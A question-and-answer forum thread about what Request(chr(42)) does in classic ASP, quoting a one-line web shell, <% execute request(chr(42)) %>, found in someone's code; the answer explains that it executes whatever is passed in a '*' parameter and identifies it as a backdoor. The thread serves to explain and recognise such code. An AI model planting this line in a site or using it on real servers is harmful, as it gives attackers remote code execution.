Reputation: 1488
What does Request("*") return in ASP classic
I came across some code that accesses Request(chr(42)) (below) and executes it.
<% execute request(chr(42)) %>
I can't seem to find what '*' would return, as it doesn't seem like a valid QueryString variable name.
Upvotes: 2
Views: 727
Answers (1)
Reputation: 2591
In classic ASP, you can call Request("some_key") and it will return the value of "some_key" of either the Request.Querystring (GET) or Request.Form (POST) data.
chr(42) is a valid key, so you can call the page with test.asp?*=command to execute something.
execute is a vbscript/asp function that lets you execute a string as ASP code, same as eval. details
before update (does not apply):
I only know of the Server.Execute method, which will execute some other ASP page.
All in all, it seems like some hack/backdoor as you suggested.
Upvotes: 3
Related Questions
- how does Request.QueryString work?
- ASP.NET MVC - What does IsAjaxRequest() actually mean?
- Request.Querystring i Classic ASP
- ASP Classic: request function for url param not working?
- Retrieving parameters from request ASP Classic 3.0
- What does Request[" "] mean?
- What is the contents of the Request[] collection
- what is the original location for asp.net request?
- What is the verb="*"?
- What does the Request object do in the following scenario?